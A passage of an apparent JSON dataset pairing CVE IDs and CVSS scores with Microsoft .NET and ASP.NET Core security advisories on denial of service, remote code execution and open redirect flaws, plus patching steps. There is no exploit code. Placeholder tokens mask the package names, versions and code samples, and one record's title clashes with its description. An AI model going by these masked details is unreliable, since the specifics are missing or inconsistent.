Transitive dependencies occur when you add a package to your project that in turn relies on another package. 
For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends on APITAG , your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. 
We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. 
The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. 
Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG respectively. The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Eric Scott URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87733. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87734. "severity": "HIGH",
  87735. "baseScore": 7.5,
  87736. "impactScore": 3.6,
  87737. "exploitabilityScore": 3.9
  87738. },
  87739. {
  87740. "CVE_ID": "CVE-2020-1597",
  87741. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/162",
  87742. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/162",
  87743. "Repo_new": "dotnet/announcements",
  87744. "Issue_Created_At": "2020-08-11T17:08:44Z",
  87745. "description": "Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87746. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87747. "severity": "HIGH",
  87748. "baseScore": 7.5,
  87749. "impactScore": 3.6,
  87750. "exploitabilityScore": 3.9
  87751. },
  87752. {
  87753. "CVE_ID": "CVE-2022-24512",
  87754. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/213",
  87755. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/213",
  87756. "Repo_new": "dotnet/announcements",
  87757. "Issue_Created_At": "2022-03-08T18:35:34Z",
  87758. "description": "Microsoft Security Advisory CVETAG | .NET Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG | .NET Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A Remote Code Execution vulnerability exists in .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG where a stack buffer overrun occurs in .NET Double Parse routine. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET NUMBERTAG or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET NUMBERTAG NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87759. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
  87760. "severity": "MEDIUM",
  87761. "baseScore": 6.3,
  87762. "impactScore": 3.4,
  87763. "exploitabilityScore": 2.8
  87764. },
  87765. {
  87766. "CVE_ID": "CVE-2020-1147",
  87767. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/159",
  87768. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/159",
  87769. "Repo_new": "dotnet/announcements",
  87770. "Issue_Created_At": "2020-07-14T17:06:53Z",
  87771. "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a remote code execution vulnerability exists in .NET software when the software fails to check the source markup of an XML file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to an ASP.NET Core application, or other application that parses certain types of XML. The security update addresses the vulnerability by restricting the types that are allowed to be present in the XML payload. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG Preview NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? 
To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87772. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87773. "severity": "HIGH",
  87774. "baseScore": 7.8,
  87775. "impactScore": 5.9,
  87776. "exploitabilityScore": 1.8
  87777. },
  87778. {
  87779. "CVE_ID": "CVE-2019-0981",
  87780. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/113",
  87781. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/113",
  87782. "Repo_new": "dotnet/announcements",
  87783. "Issue_Created_At": "2019-05-14T17:06:24Z",
  87784. "description": "Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when .NET Core and ASP.NET Core improperly handle web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core and ASP.NET Core application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to a .NET Core application. The update addresses the vulnerability by correcting how .NET Core and ASP.NET Core web applications handle web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors There are no mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses the APITAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are part of .NET Core. If you are running a vulnerable version of .NET Core you may be affected. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed you can list the versions you have installed by running the APITAG command. 
You will see output like the following; ERRORTAG If your version of .NET Core does not support the APITAG command then you have either .NET Core NUMBERTAG or .NET Core NUMBERTAG installed. For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from URLTAG PATHTAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG Once you have installed the updated runtime or SDK you should restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime you must update your app, recompile and redeploy it for the update to take effect. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87785. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87786. "severity": "HIGH",
  87787. "baseScore": 7.5,
  87788. "impactScore": 3.6,
  87789. "exploitabilityScore": 3.9
  87790. },
  87791. {
  87792. "CVE_ID": "CVE-2019-1075",
  87793. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/373",
  87794. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/373",
  87795. "Repo_new": "aspnet/announcements",
  87796. "Issue_Created_At": "2019-07-09T17:01:09Z",
  87797. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Spoofing Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Spoofing Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a spoofing vulnerability that exists in ASP.NET Core that could lead to an open redirect. An attacker who successfully exploited the vulnerability could redirect a targeted user to a malicious website. To exploit the vulnerability, an attacker could send a link that has a specially crafted URL and convince the user to click the link. The update addresses the vulnerability by correcting how ASP.NET Core parses URLs. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any ASP.NET Core based application that uses any of following vulnerable packages: Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are part of .NET Core. If you are running a vulnerable version of .NET Core you may be affected. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed, you can list the versions you have installed by running the APITAG command. 
You will see output like the following; ERRORTAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG you need to install updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime, you must update your app, recompile and redeploy it for the update to take effect. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG respectively. The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgements Reported through Datalust External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87798. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  87799. "severity": "MEDIUM",
  87800. "baseScore": 6.1,
  87801. "impactScore": 2.7,
  87802. "exploitabilityScore": 2.8
  87803. },
  87804. {
  87805. "CVE_ID": "CVE-2019-0980",
  87806. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/112",
  87807. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/112",
  87808. "Repo_new": "dotnet/announcements",
  87809. "Issue_Created_At": "2019-05-14T17:04:45Z",
  87810. "description": "Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when .NET Core and ASP.NET Core improperly handle web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core and ASP.NET Core application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to a .NET Core application. The update addresses the vulnerability by correcting how .NET Core and ASP.NET Core web applications handle web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors There are no mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses the APITAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are part of .NET Core. If you are running a vulnerable version of .NET Core you may be affected. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed you can list the versions you have installed by running the APITAG command. 
You will see output like the following; ERRORTAG If your version of .NET Core does not support the APITAG command then you have either .NET Core NUMBERTAG or .NET Core NUMBERTAG installed. For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from URLTAG PATHTAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG Once you have installed the updated runtime or SDK you should restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime you must update your app, recompile and redeploy it for the update to take effect. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87811. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87812. "severity": "HIGH",
  87813. "baseScore": 7.5,
  87814. "impactScore": 3.6,
  87815. "exploitabilityScore": 3.9
  87816. },
  87817. {
  87818. "CVE_ID": "CVE-2020-1108",
  87819. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/157",
  87820. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/157",
  87821. "Repo_new": "dotnet/announcements",
  87822. "Issue_Created_At": "2020-06-09T17:22:15Z",
  87823. "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability Update]. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability which exists when .NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core application. APITAG update addresses the vulnerability by correcting how the .NET Core web application handles web requests. The previous update contained an incomplete fix, the runtime and SDK version numbers have now been updated to the runtimes and SDKs that have the complete fix. This new issue has been created for users which subscribe to the announcements via email or other automated means which may not show issue changes._ Discussion Discussion for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG Preview NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? 
If you have a runtime or SDK with a version listed in [affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG For machines running .NET NUMBERTAG Preview you should download and install .NET NUMBERTAG Preview NUMBERTAG when available from FILETAG If you have multiple affected versions you must update the runtime or SDKs for each version. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. 
